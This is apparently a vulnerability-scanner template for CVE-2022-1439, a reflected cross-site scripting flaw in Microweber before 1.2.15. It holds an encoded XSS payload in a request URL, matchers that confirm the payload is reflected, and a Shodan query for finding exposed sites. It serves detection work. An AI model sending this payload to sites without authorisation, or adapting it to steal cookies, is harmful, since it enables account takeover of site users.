id: CVE-2022-1439

info:
  name: Microweber <1.2.15 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
    - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
    - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1439
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1439
    cwe-id: CWE-79
  metadata:
    shodan-query: http.favicon.hash:780351152
  tags: cve,cve2022,microweber,xss,huntr

requests:
  - method: GET
    path:
      - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "<div class='x module module-'onmouseover=alert(document.domain) '"
          - "parent-module-id"
        condition: and

# Enhanced by md on 2022/09/12